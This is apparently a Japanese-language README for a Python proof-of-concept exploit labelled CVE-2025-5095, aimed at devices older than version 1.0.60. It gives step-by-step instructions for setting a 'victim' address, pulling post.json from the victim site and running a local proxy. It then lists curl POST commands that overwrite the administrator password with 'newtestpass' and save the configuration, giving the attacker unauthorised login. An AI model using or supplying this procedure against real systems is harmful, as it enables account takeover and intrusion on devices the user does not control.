
CVE-2025-5095 用の Python POC
使用方法:
Login.htmを開き、「IP:PORT」の部分を被害者のアドレスに編集します
var LoginVersion = "Check On The Victim Site"; の部分を被害者ページのバージョンに編集します。これにより、被害者ページにアクセスしてソースとして表示できます
警告: このCVEは1.0.60より古いバージョンでのみ動作します
被害者サイト(http://victimip:port/post.json)からpost.jsonファイルをダウンロードします
それをスクリプトフォルダに移動すると、3つのファイルがそろいます
次に、Pythonファイルを実行して127.0.0.1:8080/login.htmにアクセスします(ポート8080が既に使用されている場合は、テキストエディタでスクリプトを開き、最後の部分を変更できます)
ログインページを開くときのアラートは無視してください
ターミナルを開き、以下のcurlコマンドを使用します。「success」と表示されれば成功です。
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
ページが変更されたか確認するには、次のコマンドを送信してください:
curl http://localhost:8080/check_password
次に、被害者サイト(localhostの方ではなく)にアクセスし、新しいパスワードを入力します。この例では、パスワードは「newtestpass」です。